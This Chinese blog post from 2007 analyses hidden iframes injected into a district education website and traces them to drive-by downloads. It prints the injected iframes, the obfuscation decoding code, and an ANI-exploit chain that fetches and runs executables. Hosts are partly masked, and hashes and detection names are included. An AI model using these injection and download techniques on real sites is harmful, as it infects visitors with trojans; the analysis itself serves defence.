某市河西区教育信息网升级为历代挂马技术展示平台

来源：互联网发布：西工大网络教育编辑：程序博客网时间：2024/04/27 18:23

endurer 原创

2007-05-15 第1版

此前普发现此网被加入传播Worm.Win32.Viking.jr等的代码，可参考：

某市河西区教育信息网被加入传播Worm.Win32.Viking.jr等的代码
http://endurer.bokee.com/6186405.html
http://blog.csdn.net/Purpleendurer/archive/2007/03/26/1542040.aspx
http://blog.sina.com.cn/u/49926d910100082w

刚才去转了一下，发现那里已“升级”成了历代挂马技术展示平台，从加入多余空格、用escape()加密等简单方法，到US-ASCII、ANI漏洞，一应俱全。

在主页末发现代码：
/---
＜iframe src＝"hxxp://w***.q**b*b**d.com/bd***.htm?001" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.m***m*ju.net/bbs/tj***.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞＜iframe src＝"hxxp://idc**.ki*s***163.com/index.html?id＝hagk" width＝"0" height＝"0"＞＜/iframe＞
＜iframe src＝hxxp://www.hao123***hao123*.cn/ok***/index.htm width＝0 height＝0＞＜/iframe＞＜iframe src＝hxxp://www.x**4*5*4**.cn/ width＝100 height＝0 frameborder＝0＞＜/iframe＞＜iframe src＝hxxp://www.x**4*5*4**.cn/ width＝100 height＝0 frameborder＝0＞＜/iframe＞＜iframe src＝hxxp://www.x**4*5*4**.cn/ width＝100 height＝0 frameborder＝0＞＜/iframe＞
＜iframe src＝hxxp://qq***.h*1***48.cn/ width＝100 height＝0 frameborder＝0＞＜/iframe＞
---/

hxxp://w***.q**b*b**d.com/bd***.htm?001 包含代码：
/---
＜BODY style＝'CURSOR: url(hxxp://s***.g*c***uj.com/t.js)'＞

＜iframe src＝"hxxp://s***.g*c***uj.com/1.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

t.js 利用 ANI 漏洞下载 0.exe

文件说明符 : D:/test/0.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 12:55:0
修改时间 : 2007-5-15 12:55:52
访问时间 : 2007-5-15 12:56:53
大小 : 36864 字节 36.0 KB
MD5 : 03e68c72bb560cd19711afdebd63c73c

Kaspersky 报为 Worm.Win32.Delf.bs

hxxp://s***.g*c***uj.com/1.htm的内容为 Javascript 代码，功能是用unescape() 解出变量 Words 的值并输出。

解出的Words 值为 VBScript 代码，功能是利用 Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载文件 0.exe，保存为 IE临时文件夹中的 install.com，并利用Shell.Application 对象 Q 的 ShellExecute 方法来运行。

hxxp://s***.g*c***uj.com/bd.htm?001 的内容与hxxp://w***.q**b*b**d.com/bd***.htm?001相同。

hxxp://idc**.ki*s***163.com/index.html?id＝hagk 包含代码：
/---
＜script src＝css.js＞＜/script＞
---/

hxxp://idc**.ki*s***163.com/css.js 内容为JavaScript脚本代码，功能为用自定义函数解密代码并通过 eval() 来运行。

解密后的内容为JavaScript脚本代码，功能为是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 hxxp://bo*ol***o*m.com/love.exe，就是昨天

小心免费送6位QQ号码的网站传播Worm.Win32.Viking.lj/Worm.Viking.sv
http://endurer.bokee.com/6274049.html
http://blog.csdn.net/Purpleendurer/archive/2007/05/14/1608238.aspx
http://blog.sina.com.cn/u/49926d91010008pd

中的那个。

hxxp://www.hao123***hao123*.cn/ok***/index.htm 包含代码：
/---
＜iframe src＝"hxxp://www.hao123***hao123*.cn/bbs/1881.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://www.hao123***hao123*.cn/bbs/1881.htm 包含代码：
/---
＜iframe src＝"hxxp://www.f*z***zv.com/sousuo.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.955***92**2.cn/web.htm" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.hao123***hao123*.cn/" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.i***p**5*28.cn/" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://www.f*z***zv.com/sousuo.htm 包含代码：
/---
＜iframe src＝"hxxp://s***.g*c***uj.com/bd.htm?268001" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
---/

hxxp://s***.g*c***uj.com/bd.htm?268001内容与hxxp://w***.q**b*b**d.com/bd***.htm?001相同。

hxxp://www.955***92**2.cn/web.htm 包含代码：
/---
＜iframe src＝hxxp://www.1****8d**m*m***.com/dm/kehu0738.htm width＝0 height＝0＞＜/iframe＞
---/

hxxp://www.1****8d**m*m***.com/dm/kehu0738.htm 的包含使用是US-ASCII编码的字符串。到http://purpleendurer.ys168.com 下载 US-ASCII加密、解密程序进行解密，得到的内容为：
/---
＜HTML＞
＜BODY＞
＜DIV id＝new_content_jp style＝"DISPLAY: none"＞
＜DIV style＝"CURSOR: url('hxxp://1****8d**m*m***.com/arp/1.jpg')"＞
＜DIV style＝"CURSOR: url('hxxp://1****8d**m*m***.com/arp/2.jpg')"＞＜/DIV＞＜/DIV＞＜/DIV＞
＜SCRIPT language＝javascript src＝"hxxp://1****8d**m*m***.com/arp/run.js"＞＜/SCRIPT＞
＜/BODY＞
＜iframe src＝hxxp://www.1****8d**m*m***.com/arp/0614.htm width＝0 height＝0＞＜/iframe＞
＜/HTML＞
---/

1.jpg 和 2.jpg 利用 ANI 漏洞下载 down.exe

文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 13:15:51
修改时间 : 2007-5-15 13:17:39
访问时间 : 2007-5-15 13:18:17
大小 : 18944 字节 18.512 KB
MD5 : c23c3fabe68fdadd14a89bf111f8bf2e

Kaspersky 报为 Trojan-Downloader.Win32.Delf.bko

hxxp://1****8d**m*m***.com/arp/run.js 的功能是检测浏览器种类和版本，并输出显示 1.jpg 和 2.jpg 的代码。

hxxp://www.1****8d**m*m***.com/arp/0614.htm 包含 JavaScript 和 VBScript 代码，使用代码
/---
DO WHILE LEN(S)＞1
    k＝"&H"+ucase(LEFT(S,2))
    p＝CLng(k)
    m＝chr(p)
    D＝D&m
    S＝mymid(S)
LOOP
---/
解密变量 S 的值，按照变量 flag_type 的值，以VBScript、JavaScript 或 HTML的形式输出。这里flag_type 的值为 "vbs"，所以输出的是 VBScript 代码，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 down.exe，保存到IE临时文件夹中，创建 down.vbs，并利用Shell.Application 对象 Q 的 ShellExecute 方法来运行。

hxxp://www.hao123***hao123*.cn/ 包含代码：
/---
＜iframe src＝hxxp://www.s*en***love.com/a**/2.htm width＝50 height＝0＞＜/iframe＞
---/

hxxp://www.s*en***love.com/a**/2.htm 包含代码：
/---
＜DIV style＝"CURSOR: url('hxxp://www.s*en***love.com/a**/a.jpg')"＞
＜DIV style＝"CURSOR: url('hxxp://www.s*en***love.com/a**/b.jpg')"＞＜/DIV＞＜/DIV＞＜/BODY＞＜/HTML＞
＜iframe src＝v1.htm width＝0 height＝0＞＜/iframe＞
---/
a.jpg 和 b.jpg 利用 ANI 漏洞下载 hxxp://www.s*en***love.com/a**/2.exe

文件说明符 : D:/test/2.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 13:23:35
修改时间 : 2007-5-15 13:24:28
访问时间 : 2007-5-15 13:25:1
大小 : 23030 字节 22.502 KB
MD5 : b43b5493549c4f7658850bdbe41e8c4f

Kaspersky 报为 Trojan-PSW.Win32.Delf.qc

hxxp://www.s*en***love.com/a**/v1.htm 包含代码：
/---
＜script src＝1.js＞＜/script＞
---/

1.js打不开，可能已不存在。

hxxp://www.i***p**5*28.cn/ 包含代码：
/---
＜iframe src＝hxxp://www.08***3***25.cn/wm/xin4***.htm?110 width＝0 height＝0＞＜/iframe＞
---/

hxxp://www.08***3***25.cn/wm/xin4***.htm?110 包含代码：
/---
＜BODY style＝'CURSOR: url(hxxp://www.08***3***25.cn/wm/d.jpg)'＞＜/BODY＞
＜/HTML＞
＜script src＝hxxp://www.08***3***25.cn/wm/0614.js＞＜/script＞
---/

d.jpg 利用 ANI 漏洞下载 hxxp://www.08***3***25.cn/wm/down.exe

文件说明符 : D:/test/down.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 13:42:49
修改时间 : 2007-5-15 13:43:54
访问时间 : 2007-5-15 13:44:42
大小 : 16619 字节 16.235 KB
MD5 : a961822d4e5d96a4f2e58be91f83a450

Kaspersky 报为 Trojan-Downloader.Win32.Delf.bko 和 Worm.Win32.Delf.bs

hxxp://www.08***3***25.cn/wm/0614.js的内容为JavaScript脚本代码，功能为用自定义函数解密代码并通过 eval() 来运行。

经过2次解密后的内容为JavaScript脚本代码，功能是利用 Microsoft.XMLHTTP 和 scrīpting.FileSystemObject 下载文件 down.exe，保存到%windir%，文件名由自定义函数：
/---
function gn（n）｛ var number ＝ Math.random（）＊n； return ‘~tmp’＋‘.tmp’；｝
---/
生成，即~tmp.tmp，然后通过 Shell.Application 对象 Q 的 ShellExecute 方法执行命令： %windir%/system32/cmd.exe /c %windir%/~tmp.tmp 来运行。

hxxp://www.x**4*5*4**.cn/ 包含代码：
/---
＜iframe src＝"hxxp://qq.5**20s**f.org/4*1**/index.htm" width＝"100" height＝"0"＞＜/iframe＞
＜iframe src＝hxxp://qq.5**20s**f.org/4*1**/06014.htm width＝0 height＝0＞＜/iframe＞
＜iframe src＝"hxxp://www.5**4*6***0w.cn/index.htm" width＝"100" height＝"0"＞＜/iframe＞
＜iframe src＝"hxxp://www.m***hk***j52**0.com/index.htm" width＝"100" height＝"0"＞＜/iframe＞
---/

hxxp://qq.5**20s**f.org/4*1**/index.htm 包含代码：
/---
＜script src＝"hxxp://qq.5**20s**f.org/4*1**/xjz2007.js"＞＜/script＞
---/

hxxp://qq.5**20s**f.org/4*1**/xjz2007.js 包含代码：
/---
document.writeln("＜iframe src＝xjz2007.htm width＝0 height＝0 frameborder＝0＞＜//iframe＞");
document.writeln("＜DIV style＝/"CURSOR: url(/'xjz2007.bmp/')/"＞");
document.writeln("＜//DIV＞＜//BODY＞＜//HTML＞")
---/

hxxp://qq.5**20s**f.org/4*1**/xjz2007.htm 包含VBScript代码，不过不用解密，因为变量xinchunkuaile 值已经展示下载的文件是 6xz.exe。

文件说明符 : D:/test/6xz.exe
属性 : A---
获取文件版本信息大小失败!
创建时间 : 2007-5-15 13:45:1
修改时间 : 2007-5-15 13:45:1
访问时间 : 2007-5-15 13:45:23
大小 : 22528 字节 22.0 KB
MD5 : 410da0576768619b234adbda5ba06bc5

Kaspersky 报为 Downloader.Win32.Small.eor

xjz2007.bmp 利用 ANI 漏洞下载 6xz.exe

hxxp://qq.5**20s**f.org/4*1**/06014.htm　的内容加入有许多空格，所含javaScript代码的功能是其功能是利用 Adodb.Stream、Microsoft.XMLHTTP 和 Scripting.FileSystemObject 下载6xz.exe，保存为ie.exe，创建 ie.vbs，并利用Shell.Application 对象 Q 的 ShellExecute 方法来运行。
其中还包含一个自定义函数Exploit（）。

hxxp://www.5**4*6***0w.cn/index.htm　包含代码：
/---
＜iframe src＝"hxxp://www.p***um**a163**.com/p***u/709671697.htm?56" width＝"0" height＝"0" frameborder＝"0"＞＜/iframe＞
s"＞＜/script＞
---/

hxxp://www.p***um**a163**.com/p***u/709671697.htm?56　包含代码：
/---
＜script src＝614.js＞＜/script＞
---/

hxxp://www.p***um**a163**.com/p***u/614.js的内容与

中的相同，下载 pu.exe。

hxxp://www.m***hk***j52**0.com/index.htm　包含代码：
/---
＜iframe src＝hxxp://www.08***3***25.cn/wm/xin16.htm width＝0 height＝0＞＜/iframe＞
---/

hxxp://www.08***3***25.cn/wm/xin16.htm 内容与 hxxp://www.08***3***25.cn/wm/xin4***.htm?110相同。

hxxp://qq***.h*1***48.cn/ 打不开。